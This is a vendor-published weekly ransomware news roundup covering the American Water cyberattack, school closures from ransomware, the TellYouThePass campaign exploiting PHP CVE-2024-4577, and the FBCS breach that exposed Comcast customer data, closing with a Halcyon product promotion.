Last Week in Ransomware: 10.14.2024

Last week in ransomware news we saw a ransomware attack disrupt the largest water utility in the US, ransomware attacks becoming the new snow days for schools, and the TellYouThePass gang actively exploiting a PHP flaw...

Attack Disrupts Largest Water Utility in US  

American Water, the largest regulated water and wastewater utility in the United States, disclosed that it experienced a cyberattack affecting its billing systems. Serving over 14 million people across 14 states and operating on 18 military installations, the company detected unauthorized activity last Thursday and took immediate action by disconnecting or deactivating certain systems to protect customer data and prevent further harm. Ruben Rodriguez, an American Water spokesperson, confirmed that the company’s water and wastewater operations were not impacted.

American Water is cooperating with law enforcement and conducting a thorough investigation, but has not disclosed which specific systems were affected or the duration of the downtime. While it is unclear whether the incident involved ransomware, the company’s response—shutting down parts of its network—is typical in such scenarios. Customers will not incur late fees while billing systems remain offline.

The attack highlights the vulnerability of critical infrastructure to cyber threats, especially when nation-state actors may be involved. Such incidents blur the line between financially motivated cybercrime and state-sponsored attacks aimed at advancing geopolitical goals. The complexity of attributing these attacks provides plausible deniability for state entities and complicates efforts to mitigate and respond to disruptions targeting essential services.

READ MORE HERE

Ransomware: New Snow Days for Schools  

In early September, Highline Public Schools, a large K-12 district in Washington State serving over 17,500 students, experienced a ransomware attack that forced the temporary closure of all its 34 schools.  

The incident, detected on September 7, led the district to shut down schools and suspend activities while its central office remained open. Highline initiated an investigation with the help of a third-party cybersecurity forensic specialist and notified the FBI, collaborating with state and federal agencies to assess the scope of the breach.  

While it remains unclear if any personal data was compromised, the district is offering a year of free credit and identity monitoring services to all employees as a precautionary measure.

Highline is currently rebuilding its network infrastructure, planning to start re-imaging student and staff devices on October 14. This attack highlights the growing vulnerability of educational institutions to cyber threats.  

Similarly, Charles Darwin School in South London also faced a severe ransomware attack that temporarily closed its doors in September, impacting 1,300 students.

The rising frequency of such incidents has prompted the Cybersecurity and Infrastructure Security Agency (CISA) to update its guidelines for K-12 schools. However, many schools lack the necessary resources to implement these security recommendations effectively, leaving them vulnerable to sophisticated cyber-attacks.  

To combat these threats, the education sector requires increased funding, skilled personnel, and robust cybersecurity programs. Without such investments, schools may continue to experience disruptions akin to “cyber snow days,” placing both education and sensitive data at risk.

READ MORE HERE

TellYouThePass Actively Exploiting PHP Flaw

Researchers have detected active attacks using the TellYouThePass ransomware to exploit a new PHP vulnerability, identified as CVE-2024-4577. This vulnerability surfaced after a recent patch aimed to fix a 12-year-old code execution flaw but inadvertently introduced an authentication bypass.  

Although the PHP development team quickly issued a fix in versions 8.3.8, 8.2.20, and 8.1.29, threat actors acted rapidly, exploiting the flaw before many users could update their systems.

The campaign employs the mshta.exe binary to execute a malicious HTML application, which runs a VBScript to load the ransomware directly into memory during runtime. Researchers uncovered a .NET variant of TellYouThePass that communicates with its command-and-control (C&C) server, encrypting files and demanding a ransom of 0.1 BTC.

The speed of exploitation underscores the growing trend of attackers leveraging automation to target unpatched systems. Organizations are urged to apply the patch for CVE-2024-4577 immediately and enhance defenses with robust antimalware tools and web application firewalls (WAFs).

However, keeping systems up to date is a challenge due to the need for extensive testing and compatibility issues with legacy systems. This complexity, combined with automated tools used by attackers, makes timely patching crucial for preventing ransomware attacks that target security gaps and misconfigurations in enterprise environments.

READ MORE HERE

Ransomware Attack Impacts Hits Comcast Customers

A data breach involving Financial Business and Consumer Solutions (FBCS) has impacted several major companies, including Comcast, Truist Bank, and Capio & CF Medical, exposing the personal information of approximately 4 million individuals.  

The breach, which originated in February 2024, initially affected 1.9 million people before the numbers were revised in June. Attackers infiltrated FBCS’s systems, stole sensitive data, and encrypted files in a ransomware attack that went undetected for nearly two weeks.

Among the affected, over 237,700 Comcast customers had sensitive information compromised, such as names, addresses, Social Security numbers, birth dates, and account details.

Notably, the breach impacted Comcast customers who signed up around 2021, despite Comcast no longer utilizing FBCS for debt collection since 2020. Truist Bank and Capio & CF Medical, which use FBCS for debt collection services, were also significantly impacted.

Comcast is offering one year of credit monitoring to affected customers, while FBCS continues to investigate the attack but has not disclosed full details. This incident underscores the vulnerabilities associated with third-party service providers, exposing both organizations and their clients to downstream risks when security measures are insufficient.

Third-party breaches can create a domino effect, impacting all associated organizations due to limited visibility into the third party’s security posture and lack of control over shared data.  

Ransomware operators increasingly exploit third-party compromises to infiltrate additional targets, amplifying the financial and operational damage. This strategy enables attackers to extort both companies and individuals, increasing pressure and potential payouts.

The FBCS breach is a prime example of how ransomware attackers can exploit a single third-party vulnerability to access data from multiple clients, creating widespread repercussions.  

To mitigate these risks, organizations must implement robust third-party risk management strategies, including thorough vendor vetting, continuous security monitoring, and strong contractual agreements.  

Encryption and a coordinated incident response plan are also critical to prevent attackers from easily leveraging stolen data for extortion and reducing the impact of downstream risks.

READ MORE HERE

‍

Halcyon.ai eliminates the business impact of ransomware, drastically reduces downtime, prevents data exfiltration, and enables organizations to quickly and easily recover from attacks without paying ransoms or relying on backups – talk to a Halcyon expert today to find out more. Halcyon also publishes a quarterly RaaS (Ransomware as a Service) and extortion group reference guide, Power Rankings: Ransomware Malicious Quartile, and check out the Recent Ransomware Attacks resource site.